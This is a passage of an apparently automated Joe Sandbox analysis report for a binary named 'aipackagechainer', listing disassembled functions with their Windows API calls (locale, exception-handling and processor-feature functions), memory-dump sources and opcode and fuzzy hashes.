                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled__set_se_translator
                                          • String ID:
                                          • API String ID: 2480343447-0
                                          • Opcode ID: 321536ee9df13105c3962d59dfaae34b918f535c06135175d2c74d8a8f06f71f
                                          • Instruction ID: 76108af79ab8a0998a1eaee11285df749945d8004c0bf4df66221ba5ba73b983
                                          • Opcode Fuzzy Hash: 321536ee9df13105c3962d59dfaae34b918f535c06135175d2c74d8a8f06f71f
                                          • Instruction Fuzzy Hash: 5CD022B08097C0EBFB24A318EE09B393B833BD1F18F00002CE4860A592C6A13AC4B303
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: P?5w
                                          • API String ID: 0-2838385722
                                          • Opcode ID: f5a9204329fd8ff0dcc5c263ef7f75e9860b98571dcc2743a63f3565948d549f
                                          • Instruction ID: f0202ffc166104400c4400300b70f3e289b1d3ae0fba01b3389fc42aff8b0a0a
                                          • Opcode Fuzzy Hash: f5a9204329fd8ff0dcc5c263ef7f75e9860b98571dcc2743a63f3565948d549f
                                          • Instruction Fuzzy Hash: 52D24770A00249DFEB24CF68C994BDEBBF4BF49304F1481A9E849AB252D775ED45CB90
                                          APIs
                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,000DF578,?,?,00000008,?,?,000EA6A4,00000000), ref: 000DF7AA
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ExceptionRaise
                                          • String ID:
                                          • API String ID: 3997070919-0
                                          • Opcode ID: b80a345628458d75d360195d655ae0db95e410529fcd0ce35a36dc8f765b6006
                                          • Instruction ID: 1de697ab4dc4106301c81bbf04e3a2724bcb770e676737be6d5a117cea1c6153
                                          • Opcode Fuzzy Hash: b80a345628458d75d360195d655ae0db95e410529fcd0ce35a36dc8f765b6006
                                          • Instruction Fuzzy Hash: 74B12A3161060ACFD758CF28C486AA47BE0FF05364F25C66AE89ACF3A1C735E991CB50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          • Opcode ID: 114236fd6af3178544d6e5467fe68701d58dded12f64a296398eac602a91e12f
                                          • Instruction ID: 4232fc11c8342eb33bd511da6aa01946dc3c8fe2ed5d2cbf576e7e7edbafc104
                                          • Opcode Fuzzy Hash: 114236fd6af3178544d6e5467fe68701d58dded12f64a296398eac602a91e12f
                                          • Instruction Fuzzy Hash: 3D024F72A083008BC75CCF19D89056BF7E2BFCC314F158A2EF89A97351DB74A955CA86
                                          APIs
                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 000CCFF6
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: FeaturePresentProcessor
                                          • String ID:
                                          • API String ID: 2325560087-0
                                          • Opcode ID: e90d4f90cc354f9e1c448353f26ba05857231bc16c64b835d7b36ecb7b1117cc
                                          • Instruction ID: c1387771878ad6c77442ef9b9d8056cc712bad19afe55aa262e0d093c8776ce0
                                          • Opcode Fuzzy Hash: e90d4f90cc354f9e1c448353f26ba05857231bc16c64b835d7b36ecb7b1117cc
                                          • Instruction Fuzzy Hash: BB518CB1E15605AFEB24CF68DC81BAEBBF4FB48310F24806AE405EB291D3749991CF54
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 84ce423ab360820d6fb7ec11cb88dcd02390c8d240c5ff5b936ebbf776735690
                                          • Instruction ID: 58daa519ee67c91dc37855cc85c8746b64d2008112a570cc7b50e6c703a0b378
                                          • Opcode Fuzzy Hash: 84ce423ab360820d6fb7ec11cb88dcd02390c8d240c5ff5b936ebbf776735690
                                          • Instruction Fuzzy Hash: A5310972900219AFDB20DFB9CC85EFBB7BDEB84310F144559F915E7241EA309E408B60
                                          APIs
                                            • Part of subcall function 000DD2E9: GetLastError.KERNEL32(?,001273F0,000D91CE,?,?,000D937D,?,?,00000000,?,?,?,00000003,000D1672,?,000D15E1), ref: 000DD2ED
                                            • Part of subcall function 000DD2E9: SetLastError.KERNEL32(00000000,?,000D17F0,?,?,?,?,?,00000000,?,?,?,000DB1A9,00123A20,0000000C,000DB467), ref: 000DD38F
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 000E6F85
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ErrorLast$InfoLocale
                                          • String ID:
                                          • API String ID: 3736152602-0
                                          • Opcode ID: d7c45444c49640182b0f7bb68a08d9cba63247ac22d5620c64b351cb6ca6645c
                                          • Instruction ID: aeea37a8b634360768620468dbc5c494bab422d36fc872d728566cb2d7d67175
                                          • Opcode Fuzzy Hash: d7c45444c49640182b0f7bb68a08d9cba63247ac22d5620c64b351cb6ca6645c
                                          • Instruction Fuzzy Hash: 9021B032604246AFDB289B26ED52EBA77E8EF24350B10407BF905E6242EA36ED40C750
                                          APIs
                                            • Part of subcall function 000DD2E9: GetLastError.KERNEL32(?,001273F0,000D91CE,?,?,000D937D,?,?,00000000,?,?,?,00000003,000D1672,?,000D15E1), ref: 000DD2ED
                                            • Part of subcall function 000DD2E9: SetLastError.KERNEL32(00000000,?,000D17F0,?,?,?,?,?,00000000,?,?,?,000DB1A9,00123A20,0000000C,000DB467), ref: 000DD38F
                                          • EnumSystemLocalesW.KERNEL32(000E6CDE,00000001,00000000,?,-00000050,?,000E730F,00000000,?,?,?,00000055,?), ref: 000E6C2A
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem
                                          • String ID:
                                          • API String ID: 2417226690-0
                                          • Opcode ID: b0dbc98b40b06562f3b7cc84a44b67962ec0cb14ca2b0b48aff6aa44498b19b9
                                          • Instruction ID: a7334efe8f5edb0451c6c7af13d17ba675a8f24bfe1594428cf0488bc791ed47
                                          • Opcode Fuzzy Hash: b0dbc98b40b06562f3b7cc84a44b67962ec0cb14ca2b0b48aff6aa44498b19b9
                                          • Instruction Fuzzy Hash: F7114C372007019FDB189F3AD8915BABB91FF94368B15443DE98697B40D772B942C740
                                          APIs
                                            • Part of subcall function 000DD2E9: GetLastError.KERNEL32(?,001273F0,000D91CE,?,?,000D937D,?,?,00000000,?,?,?,00000003,000D1672,?,000D15E1), ref: 000DD2ED
                                            • Part of subcall function 000DD2E9: SetLastError.KERNEL32(00000000,?,000D17F0,?,?,?,?,?,00000000,?,?,?,000DB1A9,00123A20,0000000C,000DB467), ref: 000DD38F
                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,000E6EFA,00000000,00000000,?), ref: 000E718C
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ErrorLast$InfoLocale
                                          • String ID:
                                          • API String ID: 3736152602-0
                                          • Opcode ID: d9970d53ea603c5b370fc28987d6636e566bfbaf394fedd9e0cd2a96019c66aa
                                          • Instruction ID: c18f79a9717c3da237d8f602f20f495c1b214a7fab8fb53a203c3bae15896b87
                                          • Opcode Fuzzy Hash: d9970d53ea603c5b370fc28987d6636e566bfbaf394fedd9e0cd2a96019c66aa
                                          • Instruction Fuzzy Hash: ECF0F932544352AFDB2997AACC46BBAB7A4EB40354F154465EC09B3180EA74FE41C590
                                          APIs
                                            • Part of subcall function 000DD2E9: GetLastError.KERNEL32(?,001273F0,000D91CE,?,?,000D937D,?,?,00000000,?,?,?,00000003,000D1672,?,000D15E1), ref: 000DD2ED
                                            • Part of subcall function 000DD2E9: SetLastError.KERNEL32(00000000,?,000D17F0,?,?,?,?,?,00000000,?,?,?,000DB1A9,00123A20,0000000C,000DB467), ref: 000DD38F
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 000E6B1A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ErrorLast$InfoLocale
                                          • String ID: utf8
                                          • API String ID: 3736152602-905460609
                                          • Opcode ID: 8be753d2e1da0aedeef32eb531b5be0e5e3b227012624b2df57852d1f3406ce4
                                          • Instruction ID: f5ce12a04f254b9bd1102c86fff01d3eb34b9b95ba36c04fe67e9e98bd90a557
                                          • Opcode Fuzzy Hash: 8be753d2e1da0aedeef32eb531b5be0e5e3b227012624b2df57852d1f3406ce4
                                          • Instruction Fuzzy Hash: 36F0A432600255ABD724AB75DC56EFA33E8DB55310F10407AF506E7281DA78AD058754
                                          APIs
                                            • Part of subcall function 000DD2E9: GetLastError.KERNEL32(?,001273F0,000D91CE,?,?,000D937D,?,?,00000000,?,?,?,00000003,000D1672,?,000D15E1), ref: 000DD2ED
                                            • Part of subcall function 000DD2E9: SetLastError.KERNEL32(00000000,?,000D17F0,?,?,?,?,?,00000000,?,?,?,000DB1A9,00123A20,0000000C,000DB467), ref: 000DD38F
                                          • EnumSystemLocalesW.KERNEL32(000E6F31,00000001,00000005,?,-00000050,?,000E72D3,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 000E6C9D
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem
                                          • String ID:
                                          • API String ID: 2417226690-0
                                          • Opcode ID: 80b3cb9caf0c5fc04c837667cc250fb719d1348732ce0222ab98b24a828f30d8
                                          • Instruction ID: aa771418d7dbbe9ea0d258a67d9d40d4a3c592106ee2f58a609814aa9693587b
                                          • Opcode Fuzzy Hash: 80b3cb9caf0c5fc04c837667cc250fb719d1348732ce0222ab98b24a828f30d8
                                          • Instruction Fuzzy Hash: D2F0F6362003445FDB245F7AE885ABA7BD1EF907A8B15442DF9455B690C672AC42C710
                                          APIs
                                            • Part of subcall function 000D8C5A: EnterCriticalSection.KERNEL32(-001290F8,?,000DA6B8,00000000,00123938,0000000C,000DA67F,?,?,000DDFFD,?,?,000DD487,00000001,00000364,00000000), ref: 000D8C69
                                          • EnumSystemLocalesW.KERNEL32(000DD781,00000001,00123B40,0000000C,000DDBD1,00000000), ref: 000DD7C6
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                          • String ID:
                                          • API String ID: 1272433827-0
                                          • Opcode ID: f5400c9b73ec46a91352498a5a9a277a0c8df079f5ca6b81f4cd8311c7b4053b
                                          • Instruction ID: a23baf87e9530c80004a46d3e223b4056e3fa352ea4646899aa20b38e0865c22
                                          • Opcode Fuzzy Hash: f5400c9b73ec46a91352498a5a9a277a0c8df079f5ca6b81f4cd8311c7b4053b
                                          • Instruction Fuzzy Hash: 64F01476A04304EFE710DFA8E842B997BE0EB48721F10416BF5109B3A1DA7959819B50
                                          APIs
                                            • Part of subcall function 000DD2E9: GetLastError.KERNEL32(?,001273F0,000D91CE,?,?,000D937D,?,?,00000000,?,?,?,00000003,000D1672,?,000D15E1), ref: 000DD2ED
                                            • Part of subcall function 000DD2E9: SetLastError.KERNEL32(00000000,?,000D17F0,?,?,?,?,?,00000000,?,?,?,000DB1A9,00123A20,0000000C,000DB467), ref: 000DD38F
                                          • EnumSystemLocalesW.KERNEL32(000E6AC6,00000001,00000005,?,?,000E7331,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 000E6BA4
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem
                                          • String ID:
                                          • API String ID: 2417226690-0
                                          • Opcode ID: 247cd812952b201edfe0dab5b22cdb3fd99114e4c860e0f5f68797143ef2297b
                                          • Instruction ID: 84b9a0b4eac5f434ed99238a3d7313a6ccf7a015cffa73d9cf21c5adc0708b8f
                                          • Opcode Fuzzy Hash: 247cd812952b201edfe0dab5b22cdb3fd99114e4c860e0f5f68797143ef2297b
                                          • Instruction Fuzzy Hash: A2F0E53A3002859BDB049F76E84567ABF94EFD1760B0A405AEA05DB651C6769882CB90
                                          APIs
                                          • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,000DCA29,?,20001004,00000000,00000002,?,?,000DC02B), ref: 000DDD09
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID:
                                          • API String ID: 2299586839-0
                                          • Opcode ID: a4bc00efc71d7521862caf793017cab5a6485d43cccf83655e8712b78f56918f
                                          • Instruction ID: 17d9fc3ac8ab076c0815132416990f57a1ee0b0a8cbcb53ea72ef7982e9acc2d
                                          • Opcode Fuzzy Hash: a4bc00efc71d7521862caf793017cab5a6485d43cccf83655e8712b78f56918f
                                          • Instruction Fuzzy Hash: 51E04F31500258BBDF122F61DC04AEE7F1AEF44750F048423FC0566261CB758921EAE1
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0006D4EC,000CCD9E), ref: 000CD4E5
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: 8078f89faac9370c2d06065bcb66774cbd90d70c6fb3247d52a656dbf01aadfa
                                          • Instruction ID: 9322d0430614ca679f1021a3c52e32ba605482bbfcb83f430de548ac60116b49
                                          • Opcode Fuzzy Hash: 8078f89faac9370c2d06065bcb66774cbd90d70c6fb3247d52a656dbf01aadfa
                                          • Instruction Fuzzy Hash:
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2ceedcd877297ace21be460c4bafb49acda9923a9bb2321cf2a768867c0e8f16
                                          • Instruction ID: ce42bdf8a7641466e1aa091020e34b1bc735817f956ad29add375415a2950bf7
                                          • Opcode Fuzzy Hash: 2ceedcd877297ace21be460c4bafb49acda9923a9bb2321cf2a768867c0e8f16
                                          • Instruction Fuzzy Hash: A022B4B3B547144BD70CCE1DCCA23A9B2D3ABD4218F0E853DB58AC3345EA7DD9198685
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4f7b47f540f2912c1f24ff1407aeec362b7fec041c948b8901ddefa1a804d27a
                                          • Instruction ID: f3971957bc9443f4d589de3a9f2c17401b742614da871890d906b7f79c27c8ac
                                          • Opcode Fuzzy Hash: 4f7b47f540f2912c1f24ff1407aeec362b7fec041c948b8901ddefa1a804d27a
                                          • Instruction Fuzzy Hash: 23321331D29F414DD7239635CC26375A289AFB73C5F15D727E86AB5EA6EB3888C34200
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c91adfbbdf73d23fe6d923e1611e63e2bc9179884cbed4cb09a63f5c58c97e2b
                                          • Instruction ID: c0e433326343c82b5f3988e2153b22c799f6e3d873aca6d67b245608b8d807cf
                                          • Opcode Fuzzy Hash: c91adfbbdf73d23fe6d923e1611e63e2bc9179884cbed4cb09a63f5c58c97e2b
                                          • Instruction Fuzzy Hash: 24227A75A00A15DFDB25DFA8C884FAEBBF1BF44311F18816DE815AB252D731AD81CB90
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 282efbfe191ea8a4c84992fc71e9c983910f4d5bb720af4709fb9ec3e8cf7e35
                                          • Instruction ID: 4192fd5ca5506a0473c794fefd133660c21f3110f7f17f8b40f7f24ec9dfbf31
                                          • Opcode Fuzzy Hash: 282efbfe191ea8a4c84992fc71e9c983910f4d5bb720af4709fb9ec3e8cf7e35
                                          • Instruction Fuzzy Hash: 3E224879A00658DFDB25CFA8C884FAEBBF5AF48305F15819CE805AB251D735ED81CB90
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 09a49bf1fc0ad1753b1a6a460b42467e9f6da1ba1218da342d7813e9e4fced52
                                          • Instruction ID: 4b2de3231bbd1f8e0b27cfa2f7f03b242b4b084e6dedbe60cb8bb33c37af787c
                                          • Opcode Fuzzy Hash: 09a49bf1fc0ad1753b1a6a460b42467e9f6da1ba1218da342d7813e9e4fced52
                                          • Instruction Fuzzy Hash: 1802E071B086618BDB1CCF18C4A477EBBE2BBCA305F144A2DE49B97385CA70D945CB85
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
